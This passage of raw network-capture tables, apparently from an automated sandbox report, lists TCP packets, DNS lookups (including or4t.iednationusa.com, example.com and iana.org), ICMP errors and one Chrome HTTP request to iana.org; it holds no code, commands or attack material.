                            Oct 10, 2024 10:17:51.053744078 CEST4434980513.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.056092978 CEST49802443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.056117058 CEST4434980213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.056134939 CEST49802443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.056143045 CEST4434980213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.059514999 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.059545040 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.059633970 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.062638044 CEST49801443192.168.2.4192.0.33.8
                            Oct 10, 2024 10:17:51.062659979 CEST44349801192.0.33.8192.168.2.4
                            Oct 10, 2024 10:17:51.068509102 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.068526030 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.071011066 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.071049929 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.071151018 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.071357965 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.071374893 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.072988033 CEST49810443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073015928 CEST4434981013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.073025942 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073035002 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.073067904 CEST49810443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073097944 CEST49811443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073103905 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073127031 CEST4434981113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.073204994 CEST49811443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073472977 CEST49810443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073489904 CEST4434981013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.073537111 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073550940 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.073620081 CEST49811443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.073635101 CEST4434981113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.096860886 CEST4434981013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.096932888 CEST49810443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.097563028 CEST4434981113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.097624063 CEST49811443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.099849939 CEST49810443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.099860907 CEST4434981013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.100292921 CEST49811443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.100325108 CEST4434981113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.101265907 CEST49812443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.101295948 CEST4434981213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.101351976 CEST49812443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.102215052 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.102237940 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.102309942 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.102775097 CEST49812443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.102787971 CEST4434981213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.241467953 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.241491079 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.744455099 CEST4434981213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.744486094 CEST4434981213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.744560957 CEST49812443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.745223045 CEST49812443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.745243073 CEST4434981213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.749088049 CEST49814443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.749109983 CEST4434981413.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.749227047 CEST49814443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.749341011 CEST49814443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.749351025 CEST4434981413.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.760454893 CEST4434981413.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.760749102 CEST49815443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.760771990 CEST4434981513.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.760859013 CEST49815443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.761195898 CEST49815443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.761205912 CEST4434981513.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.772200108 CEST4434981513.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.774921894 CEST49816443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.774960995 CEST4434981613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.775120974 CEST49816443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.775402069 CEST49816443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.775417089 CEST4434981613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.786355019 CEST4434981613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.787064075 CEST49817443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.787092924 CEST4434981713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.787164927 CEST49817443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.787477016 CEST49817443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.787487984 CEST4434981713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.798193932 CEST4434981713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.802294970 CEST49818443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.802314997 CEST4434981813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.802478075 CEST49818443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.802529097 CEST49818443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.802534103 CEST4434981813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.813577890 CEST4434981813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.813812971 CEST49819443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.813853979 CEST4434981913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.814078093 CEST49819443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.814431906 CEST49819443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.814448118 CEST4434981913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.824915886 CEST4434981913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.827337027 CEST49820443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.827369928 CEST4434982013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.827455044 CEST49820443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.827800035 CEST49820443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.827817917 CEST4434982013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.838499069 CEST4434982013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.839087009 CEST49821443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.839106083 CEST4434982113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.839184046 CEST49821443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.839615107 CEST49821443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.839636087 CEST4434982113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.861576080 CEST4434982113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.861649990 CEST49821443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.861710072 CEST49821443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.861720085 CEST4434982113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.865900040 CEST49822443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.865914106 CEST4434982213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.866015911 CEST49822443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.866194963 CEST49822443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.866205931 CEST4434982213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.876669884 CEST4434982213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.877003908 CEST49823443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.877041101 CEST4434982313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.877111912 CEST49823443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.879421949 CEST49823443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.879442930 CEST4434982313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.890786886 CEST4434982313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.926743031 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.927481890 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.928936005 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.931408882 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.931427956 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.931663990 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.931725025 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.932244062 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.932249069 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.932692051 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.932715893 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.933388948 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.933394909 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.933633089 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.933651924 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.934174061 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.934181929 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.936074018 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.936086893 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.936423063 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:51.937315941 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:51.979404926 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.029719114 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.029798031 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.029964924 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.030158997 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.030230045 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.030284882 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.030289888 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.030313969 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.030330896 CEST49808443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.030338049 CEST4434980813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.031222105 CEST49809443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.031238079 CEST4434980913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.033068895 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.033133984 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.033266068 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.035861015 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.035861015 CEST49813443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.035881042 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.035890102 CEST4434981313.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.047056913 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.047111988 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.047194004 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.047359943 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.047375917 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:52.047405005 CEST49807443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:52.047413111 CEST4434980713.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:55.222462893 CEST49752443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:55.222476959 CEST44349752192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:56.458256006 CEST4972480192.168.2.488.221.110.91
                            Oct 10, 2024 10:17:56.463587999 CEST804972488.221.110.91192.168.2.4
                            Oct 10, 2024 10:17:56.464026928 CEST4972480192.168.2.488.221.110.91
                            Oct 10, 2024 10:17:58.052803993 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:17:58.052836895 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.052993059 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:17:58.053244114 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:17:58.053263903 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.687093973 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.687447071 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:17:58.687463045 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.687788010 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.688482046 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:17:58.688540936 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:17:58.737683058 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:18:08.588211060 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:18:08.588294983 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:18:08.588388920 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:18:09.194916964 CEST49827443192.168.2.4172.217.18.4
                            Oct 10, 2024 10:18:09.194945097 CEST44349827172.217.18.4192.168.2.4
                            Oct 10, 2024 10:18:11.301846981 CEST49752443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:18:11.301975965 CEST44349752192.0.46.8192.168.2.4
                            Oct 10, 2024 10:18:11.302099943 CEST49752443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:18:19.050944090 CEST49799443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:18:19.095402956 CEST44349799192.0.46.8192.168.2.4
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 10, 2024 10:16:54.914843082 CEST53587591.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:54.919250011 CEST53497471.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:55.924987078 CEST53508791.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:56.135365963 CEST6222453192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:56.135576963 CEST5544053192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:56.151140928 CEST53554401.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:56.170347929 CEST53622241.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:57.662561893 CEST5218653192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:57.662904024 CEST5845853192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:57.669620991 CEST53521861.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:57.669878006 CEST53584581.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:57.992089033 CEST5925853192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:57.992089987 CEST4922253192.168.2.41.1.1.1
                            Oct 10, 2024 10:16:57.998970032 CEST53592581.1.1.1192.168.2.4
                            Oct 10, 2024 10:16:57.999696970 CEST53492221.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:08.042190075 CEST138138192.168.2.4192.168.2.255
                            Oct 10, 2024 10:17:09.256798983 CEST5718453192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:09.259944916 CEST5548153192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:09.264163971 CEST53571841.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:09.414864063 CEST53554811.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:10.528366089 CEST5867353192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:10.528871059 CEST6297353192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:10.680860996 CEST53586731.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:10.708921909 CEST53629731.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:11.700438976 CEST6485453192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:11.701186895 CEST6242753192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:11.796173096 CEST53648541.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:11.882250071 CEST53624271.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:12.467925072 CEST5332953192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:12.468317986 CEST5139153192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:12.475333929 CEST53533291.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:12.713294983 CEST53513911.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:13.605583906 CEST53603351.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:33.360992908 CEST53513571.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:36.138914108 CEST4979053192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:36.139202118 CEST6529853192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:36.321999073 CEST53497901.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:36.375761986 CEST53652981.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:52.970752001 CEST5328853192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:52.971585989 CEST5524553192.168.2.41.1.1.1
                            Oct 10, 2024 10:17:52.991065025 CEST53552451.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:52.993535042 CEST53532881.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:54.610096931 CEST53591731.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:54.662746906 CEST53574411.1.1.1192.168.2.4
                            Oct 10, 2024 10:17:56.965990067 CEST53547501.1.1.1192.168.2.4
                            TimestampSource IPDest IPChecksumCodeType
                            Oct 10, 2024 10:17:09.414942026 CEST192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                            Oct 10, 2024 10:17:11.882966042 CEST192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                            Oct 10, 2024 10:17:12.713413000 CEST192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                            Oct 10, 2024 10:17:36.375926018 CEST192.168.2.41.1.1.1c231(Port unreachable)Destination Unreachable
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 10, 2024 10:16:56.135365963 CEST192.168.2.41.1.1.10x47a9Standard query (0)or4t.iednationusa.comA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:56.135576963 CEST192.168.2.41.1.1.10x77baStandard query (0)or4t.iednationusa.com65IN (0x0001)false
                            Oct 10, 2024 10:16:57.662561893 CEST192.168.2.41.1.1.10x536cStandard query (0)www.example.comA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:57.662904024 CEST192.168.2.41.1.1.10x8c19Standard query (0)www.example.com65IN (0x0001)false
                            Oct 10, 2024 10:16:57.992089033 CEST192.168.2.41.1.1.10x23f9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:57.992089987 CEST192.168.2.41.1.1.10x302eStandard query (0)www.google.com65IN (0x0001)false
                            Oct 10, 2024 10:17:09.256798983 CEST192.168.2.41.1.1.10x91eStandard query (0)www.iana.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:09.259944916 CEST192.168.2.41.1.1.10x3183Standard query (0)www.iana.org65IN (0x0001)false
                            Oct 10, 2024 10:17:10.528366089 CEST192.168.2.41.1.1.10x5f66Standard query (0)www.iana.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:10.528871059 CEST192.168.2.41.1.1.10x38b3Standard query (0)www.iana.org65IN (0x0001)false
                            Oct 10, 2024 10:17:11.700438976 CEST192.168.2.41.1.1.10x107fStandard query (0)www.iana.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:11.701186895 CEST192.168.2.41.1.1.10xb4ebStandard query (0)www.iana.org65IN (0x0001)false
                            Oct 10, 2024 10:17:12.467925072 CEST192.168.2.41.1.1.10xecf3Standard query (0)www.iana.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:12.468317986 CEST192.168.2.41.1.1.10x63ffStandard query (0)www.iana.org65IN (0x0001)false
                            Oct 10, 2024 10:17:36.138914108 CEST192.168.2.41.1.1.10x71deStandard query (0)pti.icann.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:36.139202118 CEST192.168.2.41.1.1.10x579fStandard query (0)pti.icann.org65IN (0x0001)false
                            Oct 10, 2024 10:17:52.970752001 CEST192.168.2.41.1.1.10x6b05Standard query (0)www.efqm.orgA (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:52.971585989 CEST192.168.2.41.1.1.10x4563Standard query (0)www.efqm.org65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 10, 2024 10:16:56.151140928 CEST1.1.1.1192.168.2.40x77baNo error (0)or4t.iednationusa.com65IN (0x0001)false
                            Oct 10, 2024 10:16:56.170347929 CEST1.1.1.1192.168.2.40x47a9No error (0)or4t.iednationusa.com188.114.97.3A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:56.170347929 CEST1.1.1.1192.168.2.40x47a9No error (0)or4t.iednationusa.com188.114.96.3A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:57.669620991 CEST1.1.1.1192.168.2.40x536cNo error (0)www.example.com93.184.215.14A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:57.998970032 CEST1.1.1.1192.168.2.40x23f9No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:16:57.999696970 CEST1.1.1.1192.168.2.40x302eNo error (0)www.google.com65IN (0x0001)false
                            Oct 10, 2024 10:17:07.476499081 CEST1.1.1.1192.168.2.40x8ceNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:07.476499081 CEST1.1.1.1192.168.2.40x8ceNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:08.927184105 CEST1.1.1.1192.168.2.40x7d52No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:08.927184105 CEST1.1.1.1192.168.2.40x7d52No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:09.264163971 CEST1.1.1.1192.168.2.40x91eNo error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:09.264163971 CEST1.1.1.1192.168.2.40x91eNo error (0)ianawww.vip.icann.org192.0.46.8A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:09.414864063 CEST1.1.1.1192.168.2.40x3183No error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:10.680860996 CEST1.1.1.1192.168.2.40x5f66No error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:10.680860996 CEST1.1.1.1192.168.2.40x5f66No error (0)ianawww.vip.icann.org192.0.46.8A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:10.708921909 CEST1.1.1.1192.168.2.40x38b3No error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:11.796173096 CEST1.1.1.1192.168.2.40x107fNo error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:11.796173096 CEST1.1.1.1192.168.2.40x107fNo error (0)ianawww.vip.icann.org192.0.46.8A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:11.882250071 CEST1.1.1.1192.168.2.40xb4ebNo error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:12.475333929 CEST1.1.1.1192.168.2.40xecf3No error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:12.475333929 CEST1.1.1.1192.168.2.40xecf3No error (0)ianawww.vip.icann.org192.0.33.8A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:12.713294983 CEST1.1.1.1192.168.2.40x63ffNo error (0)www.iana.orgianawww.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:21.337259054 CEST1.1.1.1192.168.2.40xbae7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:21.337259054 CEST1.1.1.1192.168.2.40xbae7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:36.321999073 CEST1.1.1.1192.168.2.40x71deNo error (0)pti.icann.orgpti.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:36.321999073 CEST1.1.1.1192.168.2.40x71deNo error (0)pti.vip.icann.org192.0.33.10A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:36.375761986 CEST1.1.1.1192.168.2.40x579fNo error (0)pti.icann.orgpti.vip.icann.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:45.269623995 CEST1.1.1.1192.168.2.40xe8edNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:45.269623995 CEST1.1.1.1192.168.2.40xe8edNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:17:52.993535042 CEST1.1.1.1192.168.2.40x6b05No error (0)www.efqm.orgefqm.orgCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:17:52.993535042 CEST1.1.1.1192.168.2.40x6b05No error (0)efqm.org35.214.133.146A (IP address)IN (0x0001)false
                            Oct 10, 2024 10:18:12.141426086 CEST1.1.1.1192.168.2.40x543bNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Oct 10, 2024 10:18:12.141426086 CEST1.1.1.1192.168.2.40x543bNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                            • or4t.iednationusa.com
                            • www.example.com
                            • https:
                              • www.iana.org
                            • fs.microsoft.com
                            • otelrules.azureedge.net
                            • pti.icann.org
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449754192.0.46.8801360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            Oct 10, 2024 10:17:10.738980055 CEST447OUTGET /help/example-domains HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
